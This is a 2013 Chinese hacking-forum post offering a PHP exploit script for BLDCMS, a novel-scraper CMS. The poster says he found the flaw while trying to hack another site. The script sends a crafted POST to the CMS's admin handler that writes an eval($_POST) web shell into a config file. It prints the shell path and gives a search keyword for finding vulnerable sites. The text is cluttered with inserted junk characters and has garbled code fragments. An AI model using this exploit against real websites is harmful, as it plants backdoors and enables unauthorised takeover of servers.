找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2313|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
4 e# O4 [* M, K" I# q5 W; d- E, O. u; ?: X! C4 J

( j1 H. B. L$ L/ v话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
7 j/ c3 D4 ]5 W; x' R& ?) M 7 s0 U; c& n. ^$ J7 i4 a# d2 `2 H# G
既然都有人发了 我就把我之前写好的EXP放出来吧$ }6 A& M$ M- }! Q

3 o; x9 \0 n& W9 Lview source print?01.php;">
5 J# p* F$ w! }5 [3 E$ a02.<!--?php
$ i  I& p& x# X) i3 K03.echo "-------------------------------------------------------------------7 Y* A0 ?' D4 ^( F
04. 0 P4 I+ H+ A( U. e
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP% @' c8 \" u+ I' b0 V% m; m
06. ) v# c, s, Z' e) Y% M5 q
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
# @2 R. J1 f# o# \+ u2 |08.
# l9 N$ z: f. z; ]+ h1 [3 j  W; N09.QQ:981009941\r\n                                2013.3.21\r\n             $ G7 A/ y9 @1 k: E8 F
10.
( N9 l- N; K. l/ \8 U11.
/ f  d- L- @/ p$ `3 b12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
( O8 k8 _8 Q# X4 [, b+ p5 R13. ; P1 `) F/ ]% @
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------2 Y) [0 v' `, n) Z2 |. x# p: H( F
15. * v. U4 J6 j, D, X! d& k: I2 o
16.--------------------------------------------------------------------\r\n";/ z3 c- W- d7 F' B5 }
17.$url=$argv[1];. ]8 x3 u4 _2 r/ m
18.$dir=$argv[2];, ~6 v. o# V: l$ k- s
19.$pass=$argv[3];0 Z" Y7 D" M3 O
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';6 I, x  J; Q2 A
21.if (emptyempty($pass)||emptyempty($url))2 Y( {% o& |& a* _
22.{exit("请输入参数");}) t8 f* _/ h4 G& t4 r0 j- Z7 V
23.else
; v8 @6 I( t* h+ M3 n24.{7 v7 O" W9 [$ w) F& u
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev' c2 U. H% R7 g! \. w4 W1 w
26.
% p# d; m+ f# S27.al;% \/ B( }  a' h3 G
28.$length = strlen($fuckdata);
# z* }+ s9 E4 u* J4 Q$ U, }2 R( |; b29.function getshell($url,$pass)
# k2 H! v1 Z, ?) i# g30.{+ b0 H7 N$ Y( {/ U; e
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
1 K9 Z& k+ ^: n1 E1 o8 _( {32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
8 w7 g0 X& H. g$ b  w, M6 t9 Q/ \33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";8 K3 L) x) ~; D9 j; u5 R5 E) x$ @
34.$header .= "User-Agent: MSIE\r\n";
* @4 A' G# I5 S  E; M) ?5 g: }1 U35.$header .= "Host:".$url."\r\n";1 h6 X$ K, l' V
36.$header .= "Content-Length: ".$length."\r\n";" ]* o" E) T9 \- b! s3 F0 o/ C- H
37.$header .= "Connection: Close\r\n";1 C* x6 R8 ~; i4 Q4 T
38.$header .="\r\n";; V7 e0 p- T) O/ a9 F
39.$header .= $fuckdata."\r\n\r\n";  b$ c; ^) j8 b. A: W  |$ T
40.$fp = fsockopen($url, 80,$errno,$errstr,15);% V$ k4 F5 s' ?. _6 N, x
41.if (!$fp)8 m4 e3 P- O3 }' h. F1 l  K
42.{2 L2 f. b( a' _
43.exit ("利用失败:请检查指定目标是否能正常打开");
4 x% _* ^: y4 T+ P44.}8 J( O8 y- D4 d' \: @
45.else{ if (!fputs($fp,$header))
! L! V: d, b- {$ @46.{exit ("利用失败");}
9 N' ]2 C3 i0 t. ~8 f47.else
5 \! m( L8 P  S48.{
6 @. b9 n! b. R0 n5 N: J49.$receive = '';# Q8 k) y. U4 C4 W
50.while (!feof($fp)) {- C# q& f" Y+ q+ y4 n
51.$receive .= @fgets($fp, 1000);5 X3 _7 h. z$ N; m- W  ]
52.}  \/ H  t6 }. z3 G9 E+ R
53.@fclose($fp);) E( T4 H& {- K8 D  d
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
5 o: _' O5 i; k2 d) x55. 8 H1 O* `, H9 x* e. ~' X4 T! S6 u
56.GPC是否=off)";
# L  S) Q. K3 I9 d/ Y57.}}
* C  F, W0 p% t2 T$ L4 T! k58.}3 h2 J* T! P1 N; B% e
59.}
; w% L1 k4 B5 x% N! Z4 c- }60.getshell($url,$pass);1 L1 [( I9 A* \1 P/ |
61.?-->
. E( t, w1 a. L& b 9 D( m/ h2 J# Q, x6 {- k

% }& o6 O9 z2 m' A2 V& v % D8 p0 ~5 g. R# ^5 M+ {2 S
by 数据流
3 p" i$ Q( {5 h: o2 }3 l0 s5 ?1 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表